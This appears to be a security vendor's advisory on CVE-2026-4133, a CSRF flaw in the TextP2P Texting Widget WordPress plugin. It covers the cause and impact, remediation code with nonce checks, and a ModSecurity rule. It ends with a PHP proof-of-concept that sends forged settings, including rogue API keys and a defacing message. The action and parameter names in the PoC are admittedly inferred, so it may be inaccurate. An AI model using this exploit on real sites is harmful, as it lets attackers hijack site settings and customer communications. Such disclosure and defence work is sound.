Atomic Edge analysis of CVE-2026-4133 (metadata-based): This is a Cross-Site Request Forgery (CSRF) vulnerability in the TextP2P Texting Widget plugin for WordPress, affecting all versions up to and including 1.7. The vulnerability allows unauthenticated attackers to modify all plugin settings by tricking a site administrator into clicking a malicious link. The CVSS score of 4.3 (Medium) reflects the need for user interaction together with the limited impact on confidentiality and integrity.
The root cause, inferred from the CWE-352 (CSRF) classification and the vulnerability description, is the complete absence of nonce validation in the settings update handler. The description specifically notes that the form at line 314 lacks a wp_nonce_field() call, and the POST handler at line 7 does not call check_admin_referer() or wp_verify_nonce(). This is a confirmed finding from the Wordfence threat intelligence report. The imTextP2POptionPage() function processes all settings updates without verifying the request originated from the legitimate WordPress admin interface. This pattern is common in plugins that implement settings pages without following WordPress security best practices.
To exploit this vulnerability, an attacker crafts a malicious HTML page or link that submits a forged POST request to the WordPress admin endpoint where the plugin processes settings. The likely target URL is either /wp-admin/admin-post.php?action=imTextP2POptionPage or a direct admin-ajax.php call. The attacker includes parameters corresponding to plugin settings like chat widget titles, messages, API credentials, colors, and reCAPTCHA configuration. The attacker then tricks a logged-in administrator into visiting the malicious page or clicking the link. Since the plugin does not validate a nonce, the request is processed as if the administrator made it intentionally. The attack vector is network-based (AV:N) with low attack complexity (AC:L) and requires no privileges (PR:N) but does require user interaction (UI:R).
The remediation requires adding WordPress CSRF protection to the settings update handler. The developer should add a wp_nonce_field() to the settings form and call check_admin_referer() or wp_verify_nonce() before processing POST data. This follows standard WordPress patterns for admin page security. Since no patched version is available, site administrators should consider disabling the plugin or using a Web Application Firewall (WAF) rule to block unauthorized settings changes until a fix is released.
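The following is an added example of the remediation pattern described above; it is not the plugin's own code. It shows a settings form carrying wp_nonce_field() and an admin-post.php handler that calls check_admin_referer() before touching any POST data. The hook name follows the page's inferred action imTextP2POptionPage; the option names, the nonce action string 'imtextp2p_save_settings' and the field name 'imtextp2p_nonce' are assumptions.

```php
<?php
// Added example (not the plugin's code): settings page and handler with the
// CSRF protection the advisory calls for. Option names, nonce action and
// nonce field name are assumed; only the action name comes from the advisory.

function imtextp2p_render_settings_page() {
    // The nonce field is emitted only by this admin page, so a form hosted
    // on an attacker's site cannot carry a valid value for this user.
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <?php wp_nonce_field( 'imtextp2p_save_settings', 'imtextp2p_nonce' ); ?>
        <input type="hidden" name="action" value="imTextP2POptionPage">
        <input type="text" name="imtextp2p_chat_title"
               value="<?php echo esc_attr( get_option( 'imtextp2p_chat_title', '' ) ); ?>">
        <input type="text" name="imtextp2p_primary_color"
               value="<?php echo esc_attr( get_option( 'imtextp2p_primary_color', '' ) ); ?>">
        <?php submit_button( 'Save Settings' ); ?>
    </form>
    <?php
}

function imtextp2p_handle_settings_update() {
    // 1. Capability check: a nonce alone does not prove the caller may change
    //    settings, so reject sessions that lack manage_options first.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', 403 );
    }
    // 2. Nonce check: the missing step in the vulnerable handler. A forged
    //    cross-site POST has no valid per-user nonce and dies here with 403.
    check_admin_referer( 'imtextp2p_save_settings', 'imtextp2p_nonce' );

    // 3. Only now read, unslash and sanitise the submitted values.
    $title = isset( $_POST['imtextp2p_chat_title'] )
        ? sanitize_text_field( wp_unslash( $_POST['imtextp2p_chat_title'] ) ) : '';
    update_option( 'imtextp2p_chat_title', $title );

    $color = isset( $_POST['imtextp2p_primary_color'] )
        ? sanitize_hex_color( wp_unslash( $_POST['imtextp2p_primary_color'] ) ) : '';
    if ( $color ) {
        update_option( 'imtextp2p_primary_color', $color );
    }

    // Send the admin back to the settings page; wp_safe_redirect refuses
    // off-site targets, so a tampered referer cannot redirect elsewhere.
    wp_safe_redirect( add_query_arg( 'updated', '1', wp_get_referer() ) );
    exit;
}
// admin-post.php fires admin_post_{action} for logged-in users only; the
// nopriv variant is deliberately not registered.
add_action( 'admin_post_imTextP2POptionPage', 'imtextp2p_handle_settings_update' );
```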
The impact of successful exploitation is limited to unauthorized modification of plugin settings (C:N/I:L/A:N). An attacker could redirect chat widget traffic to their own infrastructure by changing API credentials, display malicious content through modified widget titles and messages, disable reCAPTCHA protection to allow spam, or alter widget appearance. The attacker cannot steal data directly from the database or escalate privileges. However, altering API credentials could enable man-in-the-middle attacks on customer communications.
Below is our ModSecurity-compatible rule to protect against this particular CVE. Because the vulnerable handler cannot distinguish a forged request from a legitimate one, the rule blocks every POST carrying this action, including an administrator's own settings saves, so treat it as a stopgap until a patched version is available. Note that ARGS_POST is only populated when request body inspection is enabled (SecRequestBodyAccess On).
SecRule REQUEST_URI "@streq /wp-admin/admin-post.php" "id:20264133,phase:2,deny,status:403,chain,msg:'CVE-2026-4133 CSRF attempt on TextP2P Texting Widget settings update',severity:'CRITICAL',tag:'CVE-2026-4133'"
SecRule ARGS_POST:action "@streq imTextP2POptionPage" "chain"
SecRule REQUEST_METHOD "@streq POST" "t:none"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4133 - TextP2P Texting Widget <= 1.7 Cross-Site Request Forgery to Settings Update
// Configuration
$target_url = 'http://example.com/wp-admin/admin-post.php'; // Target WordPress admin URL
$action = 'imTextP2POptionPage'; // Inferred action name based on plugin function imTextP2POptionPage()
// Malicious settings payload
$payload = array(
'action' => $action,
'imtextp2p_chat_title' => 'Hacked Chat Support',
'imtextp2p_welcome_message' => 'Your site has been compromised. Contact attacker@example.com for help.',
'imtextp2p_api_key' => 'EVILAPIKEY123456',
'imtextp2p_api_secret' => 'EVILAPISECRET7890',
'imtextp2p_primary_color' => '#ff0000',
'imtextp2p_recaptcha_site_key' => '6LeIxAcTAAAAAJcZVRqyHh71UMIEGNQ_MXjiZKhI', // Invalid key
'imtextp2p_recaptcha_secret_key' => '6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe'
);
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_xxx=admin_session_cookie'); // Requires admin cookie
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($http_code == 302 || $http_code == 200) {
echo "[+] CSRF attack likely succeeded. Plugin settings updated.\n";
echo "[+] HTTP Status: " . $http_code . "\n";
} else {
echo "[-] Attack might have failed. HTTP Status: " . $http_code . "\n";
}
curl_close($ch);
// Note: This PoC requires the attacker to trick a logged-in WordPress administrator into triggering this request.
// In a real attack, the payload would be delivered via a malicious link or HTML form.
?>